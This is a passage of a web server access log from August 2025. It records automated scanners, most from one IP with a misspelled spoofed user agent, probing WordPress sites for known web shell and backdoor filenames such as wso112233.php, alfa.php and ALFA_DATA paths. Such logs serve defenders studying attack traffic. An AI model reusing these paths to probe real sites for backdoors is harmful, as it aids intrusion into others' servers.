7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:51:36 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:01 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:06 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:08 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:13 -0400] "GET /wp-content/plugins/instabuilder2/cache/up.php HTTP/1.1" 301 280 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:16 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 250 "-" "python-requests/2.32.4" 94.16.113.252 - - [12/Aug/2025:18:52:25 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:28 -0400] "GET /alfanew.PHP7 HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:29 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:37 -0400] "GET /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php HTTP/1.1" 301 299 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:18:52:40 -0400] "GET /shell20211028.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:45 -0400] "GET /wp-includes/shell20211028.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:49 -0400] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:52 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:56 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:52:59 -0400] "GET /wp-content/plugins/instabuilder2/cache/plugins/moon.php HTTP/1.1" 301 290 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:02 -0400] "GET /radio.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:07 -0400] "GET /epinyins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:12 -0400] "GET /shell.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:17 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:19 -0400] "GET /ccx/index.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:22 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:40 -0400] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:44 -0400] "GET /wp-content/index.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:52 -0400] "GET /wp-info.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:57 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:53:59 -0400] "GET /406.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:02 -0400] "GET /wp-class.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:07 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:12 -0400] "GET /data.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:14 -0400] "GET /fw.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:20 -0400] "GET /x.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:25 -0400] "GET /c.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:29 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:34 -0400] "GET /wp-admin/alfa.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:38 -0400] "GET /403.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:54:42 -0400] "GET /wp-admin/wso112233.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:00 -0400] "GET /wp-content/wso112233.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:04 -0400] "GET /wp-includes/wso112233.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:08 -0400] "GET /wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647 HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:11 -0400] "GET /wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647 HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:17 -0400] "GET /wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647 HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:22 -0400] "GET /about.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:27 -0400] "GET /mini.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:30 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/ HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:36 -0400] "GET /lock360.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:45 -0400] "GET /ws.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:45 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:49 -0400] "GET /ws.php7 HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:52 -0400] "GET /wp-content/plugins/TOPXOH/wDR.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:55 -0400] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 275 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:55:59 -0400] "GET /wp-content/updates.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:03 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:05 -0400] "GET /shell4.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:13 -0400] "GET /a.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:18 -0400] "GET /xleet.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:26 -0400] "GET /wp-content/plugins/background-image-cropper/ups.php HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:29 -0400] "GET /1.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:36 -0400] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:40 -0400] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:45 -0400] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:49 -0400] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:52 -0400] "GET /log.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:56:57 -0400] "GET /xl2023.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:57:00 -0400] "GET /wso.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:18:57:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:18:57:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:18:57:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:18:57:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:18:57:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:18:57:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:18:57:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:18:57:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:18:58:14 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:18:58:42 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:18:58:55 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:18:58:55 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:18:58:55 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:18:58:55 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:00:57 -0400] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:00:59 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:19:01:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:19:01:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:19:01:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:19:01:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:01:25 -0400] "GET /wp-content/ HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:02:44 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:03:14 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:04:15 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:04:33 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:05:50 -0400] "GET /wp-content/patior/ HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:05:55 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 